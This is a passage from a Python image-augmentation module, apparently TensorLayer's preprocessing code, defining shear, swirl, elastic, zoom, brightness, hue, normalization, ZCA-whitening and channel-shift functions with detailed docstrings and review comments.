    x, intensity=0.1, is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shear multiple images by the same (possibly random) intensity.

    Usually used for image segmentation where x=[X, Y] must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.shear``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    amount = np.random.uniform(-intensity, intensity) if is_random else intensity
    shear_matrix = np.array([[1, -np.sin(amount), 0], [0, np.cos(amount), 0], [0, 0, 1]])
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
    # One shared transform so paired images stay aligned.
    return np.asarray([
        apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order) for data in x
    ])
def shear2(
    x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shear an image along both directions, randomly or non-randomly.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    shear : tuple of two floats
        Percentage of shear for height and width direction (0, 1).
    is_random : boolean
        If True, sample each shear component uniformly from [-s, s].
    row_index col_index and channel_index : int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    fill_mode : str
        How to fill missing pixels: `nearest` (default), `constant`, `reflect` or `wrap`.
    cval : float
        Fill value outside the input when mode='constant'. Default 0.0.
    order : int
        Interpolation order, 0-5; see ``tl.prepro.apply_transform``.

    Returns
    -------
    numpy.array
        A processed image.

    References
    -----------
    - `Affine transformation <https://uk.mathworks.com/discovery/affine-transformation.html>`__
    """
    if len(shear) != 2:
        raise AssertionError(
            "shear should be tuple of 2 floats, or you want to use tl.prepro.shear rather than tl.prepro.shear2 ?"
        )
    if is_random:
        # BUG FIX: the previous in-place `shear[0] = ...` raised TypeError for
        # the default tuple argument and mutated caller-supplied lists. Build
        # fresh values instead of writing into the argument.
        shear = (np.random.uniform(-shear[0], shear[0]), np.random.uniform(-shear[1], shear[1]))
    shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
    h, w = x.shape[row_index], x.shape[col_index]
    transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
    return apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
def shear_multi2(
    x, shear=(0.1, 0.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest', cval=0.,
    order=1
):
    """Shear multiple images along both directions with the same arguments.

    Usually used for image segmentation where x=[X, Y] must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.shear2``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if len(shear) != 2:
        raise AssertionError(
            "shear should be tuple of 2 floats, or you want to use tl.prepro.shear_multi rather than tl.prepro.shear_multi2 ?"
        )
    if is_random:
        # BUG FIX: in-place item assignment into the (default, tuple) argument
        # raised TypeError and mutated caller-owned lists; build fresh values.
        shear = (np.random.uniform(-shear[0], shear[0]), np.random.uniform(-shear[1], shear[1]))
    shear_matrix = np.array([[1, shear[0], 0], [shear[1], 1, 0], [0, 0, 1]])
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    transform_matrix = transform_matrix_offset_center(shear_matrix, h, w)
    # One shared transform so paired images stay aligned.
    return np.asarray([
        apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order) for data in x
    ])
# swirl
def swirl(
    x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
    clip=True, preserve_range=False, is_random=False
):
    """Swirl an image, randomly or non-randomly; thin wrapper over
    `skimage.transform.swirl <http://scikit-image.org/docs/dev/api/skimage.transform.html#skimage.transform.swirl>`__.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    center : tuple or 2 int or None
        Center coordinate of transformation (optional).
    strength : float
        The amount of swirling applied.
    radius : float
        The extent of the swirl in pixels; the effect dies out beyond it.
    rotation : float
        Additional rotation in degrees, usually [0, 360].
    output_shape : tuple of 2 int or None
        Shape (height, width) of the output; input shape by default.
    order : int, optional
        Spline interpolation order, 0-5; see skimage.transform.warp.
    mode : str
        One of `constant` (default), `edge`, `symmetric`, `reflect`, `wrap`.
    cval : float
        Fill value outside the image when mode is `constant`.
    clip : boolean
        Clip the output to the input's value range. Default True.
    preserve_range : boolean
        Keep the original value range instead of converting via img_as_float.
    is_random : boolean,
        If True, randomize center, strength, radius and rotation.

    Returns
    -------
    numpy.array
        A processed image.
    """
    if radius == 0:
        raise AssertionError("Invalid radius value")
    rotation = np.pi / 180 * rotation
    if is_random:
        center = (int(np.random.uniform(0, x.shape[0])), int(np.random.uniform(0, x.shape[1])))
        strength = np.random.uniform(0, strength)
        radius = np.random.uniform(1e-10, radius)
        rotation = np.random.uniform(-rotation, rotation)
    # skimage.transform.swirl expects values in [-1, 1]; rescale and restore.
    peak = np.max(x)
    rescaled = x / peak if peak > 1 else x
    swirled = skimage.transform.swirl(
        rescaled, center=center, strength=strength, radius=radius, rotation=rotation,
        output_shape=output_shape, order=order, mode=mode, cval=cval, clip=clip,
        preserve_range=preserve_range
    )
    return swirled * peak if peak > 1 else swirled
def swirl_multi(
    x, center=None, strength=1, radius=100, rotation=0, output_shape=None, order=1, mode='constant', cval=0,
    clip=True, preserve_range=False, is_random=False
):
    """Swirl a list of images with one shared (optionally randomized) parameter set.

    Typically used for image segmentation where x=[X, Y] and X, Y must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.swirl``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if radius == 0:
        raise AssertionError("Invalid radius value")
    # degrees -> radians
    rotation = np.pi / 180 * rotation
    if is_random:
        # draw the parameters once so every image receives the identical swirl
        center = (
            int(np.random.uniform(0, x[0].shape[0])),
            int(np.random.uniform(0, x[0].shape[1])),
        )
        strength = np.random.uniform(0, strength)
        radius = np.random.uniform(1e-10, radius)
        rotation = np.random.uniform(-rotation, rotation)

    results = []
    for img in x:
        peak = np.max(img)
        # skimage.transform.swirl expects values within [-1, 1]; rescale if needed
        rescaled = img / peak if peak > 1 else img
        out = skimage.transform.swirl(
            rescaled, center=center, strength=strength, radius=radius, rotation=rotation,
            output_shape=output_shape, order=order, mode=mode, cval=cval, clip=clip,
            preserve_range=preserve_range
        )
        if peak > 1:
            out = out * peak
        results.append(out)
    return np.asarray(results)
# elastic_transform
def elastic_transform(x, alpha, sigma, mode="constant", cval=0, is_random=False):
    """Elastic transformation for an image as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.

    Parameters
    -----------
    x : numpy.array
        A greyscale image: 2D array, or 3D array with a single channel.
    alpha : float
        Scaling factor for the displacement field.
    sigma : float or sequence of float
        Standard deviation for the Gaussian kernel smoothing the displacement
        field; the smaller the sigma, the stronger the distortion.
    mode : str
        Boundary mode passed to scipy's gaussian_filter. Default is `constant`.
    cval : float,
        Used in conjunction with `mode` of `constant`, the value outside the image boundaries.
    is_random : boolean
        Default is False.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    ---------
    >>> x = tl.prepro.elastic_transform(x, alpha=x.shape[1]*3, sigma=x.shape[1]*0.07)

    References
    ------------
    - `Github <https://gist.github.com/chsasank/4d8f68caf01f041a6453e67fb30f8f5a>`__.
    - `Kaggle <https://www.kaggle.com/pscion/ultrasound-nerve-segmentation/elastic-transform-for-data-augmentation-0878921a>`__
    """
    # NOTE(review): RandomState(None) seeds from OS entropy, so even
    # is_random=False is not reproducible; is_random=True seeds from the clock.
    if is_random is False:
        random_state = np.random.RandomState(None)
    else:
        random_state = np.random.RandomState(int(time.time()))

    # Accept (H, W, 1) by dropping the channel axis and restoring it at the end.
    is_3d = False
    if len(x.shape) == 3 and x.shape[-1] == 1:
        x = x[:, :, 0]
        is_3d = True
    elif len(x.shape) == 3 and x.shape[-1] != 1:
        raise Exception("Only support greyscale image")

    if len(x.shape) != 2:
        raise AssertionError("input should be grey-scale image")

    shape = x.shape
    # Random displacement fields, Gaussian-smoothed then scaled by alpha.
    dx = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha
    dy = gaussian_filter((random_state.rand(*shape) * 2 - 1), sigma, mode=mode, cval=cval) * alpha

    rows, cols = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
    indices = np.reshape(rows + dx, (-1, 1)), np.reshape(cols + dy, (-1, 1))
    warped = map_coordinates(x, indices, order=1)
    if is_3d:
        return warped.reshape((shape[0], shape[1], 1))
    return warped.reshape(shape)
def elastic_transform_multi(x, alpha, sigma, mode="constant", cval=0, is_random=False):
    """Elastic transformation for a list of images, sharing one displacement field,
    as described in `[Simard2003] <http://deeplearning.cs.cmu.edu/pdfs/Simard.pdf>`__.

    Parameters
    -----------
    x : list of numpy.array
        List of greyscale images (2D, or 3D with a single channel).
    others : args
        See ``tl.prepro.elastic_transform``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if is_random is False:
        random_state = np.random.RandomState(None)
    else:
        random_state = np.random.RandomState(int(time.time()))

    shape = x[0].shape
    if len(shape) == 3:
        shape = (shape[0], shape[1])
    new_shape = random_state.rand(*shape)

    # PERF: the displacement field depends only on new_shape/sigma/alpha, all
    # constant across the list, so compute it once instead of once per image
    # (previously the two Gaussian filters and the meshgrid were re-run in the loop).
    dx = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
    dy = gaussian_filter((new_shape * 2 - 1), sigma, mode=mode, cval=cval) * alpha
    x_, y_ = np.meshgrid(np.arange(shape[0]), np.arange(shape[1]), indexing='ij')
    indices = np.reshape(x_ + dx, (-1, 1)), np.reshape(y_ + dy, (-1, 1))

    results = []
    for data in x:
        # Accept (H, W, 1) by dropping the channel axis and restoring it below.
        is_3d = False
        if len(data.shape) == 3 and data.shape[-1] == 1:
            data = data[:, :, 0]
            is_3d = True
        elif len(data.shape) == 3 and data.shape[-1] != 1:
            raise Exception("Only support greyscale image")

        if len(data.shape) != 2:
            raise AssertionError("input should be grey-scale image")

        if is_3d:
            results.append(map_coordinates(data, indices, order=1).reshape((shape[0], shape[1], 1)))
        else:
            results.append(map_coordinates(data, indices, order=1).reshape(shape))
    return np.asarray(results)
# zoom
def zoom(
    x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
    cval=0., order=1
):
    """Zoom in and out of a single image, randomly or non-randomly.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    zoom_range : list or tuple
        Zoom range for height and width.
        - If is_random=False, (h, w) are fixed zoom factors for the row and column axes; a factor smaller than one zooms in.
        - If is_random=True, (h, w) are (min, max) of one random factor drawn per axis.
    is_random : boolean
        If True, randomly zoom. Default is False.
    row_index col_index and channel_index : int
        Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
    fill_mode : str
        Method to fill missing pixels, default `nearest`; see ``tl.prepro.apply_transform``.
    cval : float
        Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
    order : int
        The order of interpolation, in the range 0-5. See ``tl.prepro.apply_transform``.

    Returns
    -------
    numpy.array
        A processed image.
    """
    if len(zoom_range) != 2:
        raise Exception('zoom_range should be a tuple or list of two floats. Received arg: ', zoom_range)

    if is_random:
        if zoom_range[0] == 1 and zoom_range[1] == 1:
            zx = zy = 1
            tl.logging.info(" random_zoom : not zoom in/out")
        else:
            zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
    else:
        zx, zy = zoom_range

    zoom_matrix = np.array([
        [zx, 0, 0],
        [0, zy, 0],
        [0, 0, 1],
    ])
    h, w = x.shape[row_index], x.shape[col_index]
    matrix = transform_matrix_offset_center(zoom_matrix, h, w)
    return apply_transform(x, matrix, channel_index, fill_mode, cval, order)
def zoom_multi(
    x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
    cval=0., order=1
):
    """Zoom a list of images with one shared zoom factor, randomly or non-randomly.

    Typically used for image segmentation where x=[X, Y] and X, Y must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.zoom``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if len(zoom_range) != 2:
        raise Exception('zoom_range should be a tuple or list of two floats. Received arg: ', zoom_range)

    if is_random:
        if zoom_range[0] == 1 and zoom_range[1] == 1:
            zx = zy = 1
            tl.logging.info(" random_zoom : not zoom in/out")
        else:
            zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
    else:
        zx, zy = zoom_range

    zoom_matrix = np.array([
        [zx, 0, 0],
        [0, zy, 0],
        [0, 0, 1],
    ])
    h, w = x[0].shape[row_index], x[0].shape[col_index]
    matrix = transform_matrix_offset_center(zoom_matrix, h, w)
    # Apply the identical transform to every image so paired data stays aligned.
    return np.asarray([apply_transform(img, matrix, channel_index, fill_mode, cval, order) for img in x])
# image = tf.image.random_brightness(image, max_delta=32. / 255.)
# image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
# image = tf.image.random_hue(image, max_delta=0.032)
# image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
def brightness(x, gamma=1, gain=1, is_random=False):
    """Gamma-adjust the brightness of a single image, randomly or non-randomly.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    gamma : float
        Non negative real number. Default value is 1.
        - Smaller than 1 means brighter.
        - If `is_random` is True, gamma is drawn uniformly from (1-gamma, 1+gamma).
    gain : float
        The constant multiplier. Default value is 1.
    is_random : boolean
        If True, randomly change brightness. Default is False.

    Returns
    -------
    numpy.array
        A processed image.

    References
    -----------
    - `skimage.exposure.adjust_gamma <http://scikit-image.org/docs/dev/api/skimage.exposure.html>`__
    - `chinese blog <http://www.cnblogs.com/denny402/p/5124402.html>`__
    """
    if is_random:
        gamma = np.random.uniform(1 - gamma, 1 + gamma)
    return exposure.adjust_gamma(x, gamma, gain)
def brightness_multi(x, gamma=1, gain=1, is_random=False):
    """Gamma-adjust the brightness of a list of images with one shared gamma.

    Typically used for image segmentation where x=[X, Y] and X, Y must stay aligned.

    Parameters
    -----------
    x : list of numpyarray
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.brightness``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if is_random:
        # draw gamma once so every image in the pair/list is adjusted identically
        gamma = np.random.uniform(1 - gamma, 1 + gamma)
    return np.asarray([exposure.adjust_gamma(img, gamma, gain) for img in x])
def illumination(x, gamma=1., contrast=1., saturation=1., is_random=False):
    """Perform illumination augmentation for a single image, randomly or non-randomly.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    gamma : float
        Change brightness (the same with ``tl.prepro.brightness``)
        - if is_random=False, one float number, small than one means brighter, greater than one means darker.
        - if is_random=True, tuple of two float numbers, (min, max).
    contrast : float
        Change contrast.
        - if is_random=False, one float number, small than one means blur.
        - if is_random=True, tuple of two float numbers, (min, max).
    saturation : float
        Change saturation.
        - if is_random=False, one float number, small than one means unsaturation.
        - if is_random=True, tuple of two float numbers, (min, max).
    is_random : boolean
        If True, randomly change illumination. Default is False.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    ---------
    Random

    >>> x = tl.prepro.illumination(x, gamma=(0.5, 5.0), contrast=(0.3, 1.0), saturation=(0.7, 1.0), is_random=True)

    Non-random

    >>> x = tl.prepro.illumination(x, 0.5, 0.6, 0.8, is_random=False)
    """
    if is_random:
        # In random mode all three arguments must be (min, max) ranges.
        if not (len(gamma) == len(contrast) == len(saturation) == 2):
            raise AssertionError("if is_random = True, the arguments are (min, max)")

        ## random change brightness # small --> brighter
        # Pick one of three brightness regimes, then draw gamma inside it.
        illum_settings = np.random.randint(0, 3)  # 0-brighter, 1-darker, 2 keep normal

        if illum_settings == 0:  # brighter: gamma below 1, bounded by gamma[0]
            gamma = np.random.uniform(gamma[0], 1.0)  # (.5, 1.0)
        elif illum_settings == 1:  # darker: gamma above 1, bounded by gamma[1]
            gamma = np.random.uniform(1.0, gamma[1])  # (1.0, 5.0)
        else:
            gamma = 1  # leave brightness unchanged
        im_ = brightness(x, gamma=gamma, gain=1, is_random=False)

        # tl.logging.info("using contrast and saturation")
        # NOTE(review): PIL.Image.fromarray expects a uint8-compatible array —
        # confirm callers pass uint8 images.
        image = PIL.Image.fromarray(im_)  # array -> PIL
        contrast_adjust = PIL.ImageEnhance.Contrast(image)
        image = contrast_adjust.enhance(np.random.uniform(contrast[0], contrast[1]))  #0.3,0.9))

        saturation_adjust = PIL.ImageEnhance.Color(image)
        image = saturation_adjust.enhance(np.random.uniform(saturation[0], saturation[1]))  # (0.7,1.0))
        im_ = np.array(image)  # PIL -> array
    else:
        # Non-random path: apply the three fixed factors in the same order
        # (brightness -> contrast -> saturation).
        im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
        image = PIL.Image.fromarray(im_)  # array -> PIL
        contrast_adjust = PIL.ImageEnhance.Contrast(image)
        image = contrast_adjust.enhance(contrast)

        saturation_adjust = PIL.ImageEnhance.Color(image)
        image = saturation_adjust.enhance(saturation)
        im_ = np.array(image)  # PIL -> array
    return np.asarray(im_)
def rgb_to_hsv(rgb):
    """Convert an RGB image with values in [0, 255] to HSV; hue and saturation in [0, 1].

    Parameters
    ------------
    rgb : numpy.array
        An image with values between 0 and 255.

    Returns
    -------
    numpy.array
        A processed image.
    """
    # Vectorised port of colorsys.rgb_to_hsv. Any alpha channel (4th and later)
    # is copied through untouched.
    arr = rgb.astype('float')
    hsv = np.zeros_like(arr)
    hsv[..., 3:] = arr[..., 3:]

    r, g, b = arr[..., 0], arr[..., 1], arr[..., 2]
    hi = np.max(arr[..., :3], axis=-1)
    lo = np.min(arr[..., :3], axis=-1)
    hsv[..., 2] = hi  # value channel = max of R, G, B

    chroma = hi - lo
    colored = hi != lo  # grey pixels keep hue = saturation = 0
    hsv[colored, 1] = chroma[colored] / hi[colored]

    rc = np.zeros_like(r)
    gc = np.zeros_like(g)
    bc = np.zeros_like(b)
    rc[colored] = (hi - r)[colored] / chroma[colored]
    gc[colored] = (hi - g)[colored] / chroma[colored]
    bc[colored] = (hi - b)[colored] / chroma[colored]

    # Pick the hue sector from whichever channel holds the maximum.
    hsv[..., 0] = np.select([r == hi, g == hi], [bc - gc, 2.0 + rc - bc], default=4.0 + gc - rc)
    hsv[..., 0] = (hsv[..., 0] / 6.0) % 1.0
    return hsv
def hsv_to_rgb(hsv):
    """Convert an HSV image (hue/saturation in [0, 1], value in [0, 255]) to uint8 RGB.

    Parameters
    -------------
    hsv : numpy.array
        An image with values between 0.0 and 1.0

    Returns
    -------
    numpy.array
        A processed image.
    """
    # Vectorised port of colorsys.hsv_to_rgb. Any alpha channel (4th and later)
    # is copied through untouched.
    rgb = np.empty_like(hsv)
    rgb[..., 3:] = hsv[..., 3:]
    h, s, v = hsv[..., 0], hsv[..., 1], hsv[..., 2]

    sector = (h * 6.0).astype('uint8')  # which 60-degree sector the hue falls in
    frac = (h * 6.0) - sector
    p = v * (1.0 - s)
    q = v * (1.0 - s * frac)
    t = v * (1.0 - s * (1.0 - frac))
    sector = sector % 6

    conds = [s == 0.0, sector == 1, sector == 2, sector == 3, sector == 4, sector == 5]
    rgb[..., 0] = np.select(conds, [v, q, p, p, t, v], default=v)
    rgb[..., 1] = np.select(conds, [v, v, v, q, p, p], default=t)
    rgb[..., 2] = np.select(conds, [v, p, t, v, v, q], default=p)
    return rgb.astype('uint8')
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
    """Adjust the hue of an RGB image.

    Converts the image to HSV, shifts or replaces the hue channel, then converts
    back to RGB. For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__
    and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.

    Parameters
    -----------
    im : numpy.array
        An image with values between 0 and 255.
    hout : float
        The scale value for adjusting hue.
        - If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
        - If is_offset is True, add this value as the offset to the hue channel.
    is_offset : boolean
        Whether `hout` is added on HSV as offset or not. Default is True.
    is_clip : boolean
        If HSV value smaller than 0, set to 0. Default is True.
    is_random : boolean
        If True, randomly change hue. Default is False.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    ---------
    Random, add a random value between -0.2 and 0.2 as the offset to every hue values.

    >>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)

    Non-random, make all hue to green.

    >>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)

    References
    -----------
    - `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
    - `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
    - `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
    """
    hsv = rgb_to_hsv(im)
    shift = np.random.uniform(-hout, hout) if is_random else hout

    if is_offset:
        hsv[..., 0] = hsv[..., 0] + shift
    else:
        hsv[..., 0] = shift

    if is_clip:
        hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf)  # Hao : can remove green dots

    return hsv_to_rgb(hsv)
# # contrast
# def constant(x, cutoff=0.5, gain=10, inv=False, is_random=False):
# # TODO
# x = exposure.adjust_sigmoid(x, cutoff=cutoff, gain=gain, inv=inv)
# return x
#
# def constant_multi():
# #TODO
# pass
def imresize(x, size=None, interp='bicubic', mode=None):
    """Resize an image to the given output size with the given method.

    Warning, this function will rescale the value to [0, 255].

    NOTE(review): ``scipy.misc.imresize`` was deprecated in SciPy 1.0 and removed
    in SciPy 1.3; running this on a modern SciPy requires a replacement (e.g.
    ``PIL.Image.resize``) — confirm the pinned SciPy version.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    size : list of 2 int or None
        For height and width.
    interp : str
        Interpolation method for re-sizing (`nearest`, `lanczos`, `bilinear`, `bicubic` (default) or `cubic`).
    mode : str
        The PIL image mode (`P`, `L`, etc.) to convert arr before resizing.

    Returns
    -------
    numpy.array
        A processed image.

    References
    ------------
    - `scipy.misc.imresize <https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html>`__
    """
    if size is None:
        size = [100, 100]

    channels = x.shape[-1]
    if channels == 1:
        # greyscale: resize the single plane, then restore the channel axis
        resized = scipy.misc.imresize(x[:, :, 0], size, interp=interp, mode=mode)
        return resized[:, :, np.newaxis]
    if channels == 3:
        # rgb, bgr ..
        return scipy.misc.imresize(x, size, interp=interp, mode=mode)
    raise Exception("Unsupported channel %d" % channels)
# value scale
def pixel_value_scale(im, val=0.9, clip=(-np.inf, np.inf), is_random=False):
    """Scale every pixel value of an image, then clip to a range.

    Parameters
    -----------
    im : numpy.array
        An image.
    val : float
        The scale value for changing pixel value.
        - If is_random=False, multiply this value with all pixels.
        - If is_random=True, multiply a value between [1-val, 1+val] with all pixels.
    clip : tuple of 2 numbers
        The minimum and maximum value.
    is_random : boolean
        If True, see ``val``.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    ----------
    Random

    >>> im = pixel_value_scale(im, 0.1, [0, 255], is_random=True)

    Non-random

    >>> im = pixel_value_scale(im, 0.9, [0, 255], is_random=False)
    """
    factor = (1 + np.random.uniform(-val, val)) if is_random else val
    im = im * factor

    if len(clip) != 2:
        raise Exception("clip : tuple of 2 numbers")
    return np.clip(im, clip[0], clip[1])
# normailization
def samplewise_norm(
    x, rescale=None, samplewise_center=False, samplewise_std_normalization=False, channel_index=2, epsilon=1e-7
):
    """Normalize an image by rescaling, sample-wise centering and sample-wise
    std-normalization, in that order.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    rescale : float
        Rescaling factor. If None or 0, no rescaling is applied, otherwise we multiply the data by the value provided (before applying any other transformation)
    samplewise_center : boolean
        If True, set each sample mean to 0.
    samplewise_std_normalization : boolean
        If True, divide each input by its std.
    epsilon : float
        A small positive value added to the standard deviation to avoid division by zero.

    Returns
    -------
    numpy.array
        A processed image.

    Examples
    --------
    >>> x = samplewise_norm(x, samplewise_center=True, samplewise_std_normalization=True)
    >>> print(x.shape, np.mean(x), np.std(x))
    (160, 176, 1), 0.0, 1.0

    Notes
    ------
    When samplewise_center and samplewise_std_normalization are True.
    - For greyscale image, every pixels are subtracted and divided by the mean and std of whole image.
    - For RGB image, every pixels are subtracted and divided by the mean and std of this pixel i.e. the mean and std of a pixel is 0 and 1.
    """
    if rescale:
        # FIX: was `x *= rescale`, which mutated the caller's array in place and
        # raises a TypeError for integer arrays with a float rescale.
        x = x * rescale

    if x.shape[channel_index] == 1:
        # greyscale: statistics over the whole image
        if samplewise_center:
            x = x - np.mean(x)
        if samplewise_std_normalization:
            # epsilon guards against division by zero for constant images
            # (previously only the RGB branch used it).
            x = x / (np.std(x) + epsilon)
        return x
    elif x.shape[channel_index] == 3:
        # rgb: per-pixel statistics across the channel axis
        if samplewise_center:
            x = x - np.mean(x, axis=channel_index, keepdims=True)
        if samplewise_std_normalization:
            x = x / (np.std(x, axis=channel_index, keepdims=True) + epsilon)
        return x
    else:
        raise Exception("Unsupported channels %d" % x.shape[channel_index])
def featurewise_norm(x, mean=None, std=None, epsilon=1e-7):
    """Normalize every pixel by the same given mean and std, which are usually
    computed over all examples.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    mean : float
        Value for subtraction. If None, no centering is applied.
    std : float
        Value for division. If None, no scaling is applied.
    epsilon : float
        A small positive value added to ``std`` to avoid division by zero.

    Returns
    -------
    numpy.array
        A processed image.
    """
    # FIX: use `is not None` instead of truthiness — the old `if mean:` /
    # `if std:` silently skipped explicitly passed 0.0 values (epsilon already
    # protects the division when std == 0).
    if mean is not None:
        x = x - mean
    if std is not None:
        x = x / (std + epsilon)
    return x
# whitening
def get_zca_whitening_principal_components_img(X):
    """Return the ZCA whitening principal components matrix for a batch of images.

    Parameters
    -----------
    X : numpy.array
        Batch of images with dimension of [n_example, row, col, channel] (default).

    Returns
    -------
    numpy.array
        The whitening matrix (one row/column per flattened pixel).
    """
    n_samples = X.shape[0]
    flat = np.reshape(X, (n_samples, X.shape[1] * X.shape[2] * X.shape[3]))

    tl.logging.info("zca : computing sigma ..")
    sigma = np.dot(flat.T, flat) / n_samples

    tl.logging.info("zca : computing U, S and V ..")
    U, S, _ = linalg.svd(sigma)  # USV

    tl.logging.info("zca : computing principal components ..")
    # whitening matrix: U diag(1/sqrt(S + eps)) U^T, eps for numerical stability
    return np.dot(np.dot(U, np.diag(1. / np.sqrt(S + 10e-7))), U.T)
def zca_whitening(x, principal_components):
    """Apply ZCA whitening to an image using a precomputed principal components matrix.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    principal_components : matrix
        Matrix from ``get_zca_whitening_principal_components_img``.

    Returns
    -------
    numpy.array
        A processed image with the same shape as the input.
    """
    # flatten -> project through the whitening matrix -> restore original shape
    flat = np.reshape(x, (x.size))
    whitened = np.dot(flat, principal_components)
    return np.reshape(whitened, (x.shape[0], x.shape[1], x.shape[2]))
# developing
# def barrel_transform(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
#
# def barrel_transform_multi(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
# channel shift
def channel_shift(x, intensity, is_random=False, channel_index=2):
    """Shift the channel values of an image, randomly or non-randomly,
    see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.

    Parameters
    -----------
    x : numpy.array
        An image with dimension of [row, col, channel] (default).
    intensity : float
        Intensity of shifting.
    is_random : boolean
        If True, randomly shift. Default is False.
    channel_index : int
        Index of channel. Default is 2.

    Returns
    -------
    numpy.array
        A processed image.
    """
    factor = np.random.uniform(-intensity, intensity) if is_random else intensity

    x = np.rollaxis(x, channel_index, 0)  # channel-first for per-channel work
    lo, hi = np.min(x), np.max(x)
    shifted = [np.clip(channel + factor, lo, hi) for channel in x]
    x = np.stack(shifted, axis=0)
    return np.rollaxis(x, 0, channel_index + 1)  # restore the original layout
# x = np.rollaxis(x, channel_index, 0)
# min_x, max_x = np.min(x), np.max(x)
# channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
# for x_channel in x]
# x = np.stack(channel_images, axis=0)
# x = np.rollaxis(x, 0, channel_index+1)
# return x
def channel_shift_multi(x, intensity, is_random=False, channel_index=2):
    """Shift the channels of a list of images with one shared shift factor,
    see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.

    Usually used for image segmentation where x=[X, Y] and X, Y must stay aligned.

    Parameters
    -----------
    x : list of numpy.array
        List of images with dimension of [n_images, row, col, channel] (default).
    others : args
        See ``tl.prepro.channel_shift``.

    Returns
    -------
    numpy.array
        A list of processed images.
    """
    if is_random:
        factor = np.random.uniform(-intensity, intensity)
    else:
        factor = intensity

    results = []
    for data in x:
        data = np.rollaxis(data, channel_index, 0)
        min_x, max_x = np.min(data), np.max(data)
        # BUG FIX: previously iterated `x` (the whole list) instead of `data`,
        # and rolled `x` back instead of `data`, so the output was built from
        # the wrong array entirely.
        channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in data]
        data = np.stack(channel_images, axis=0)
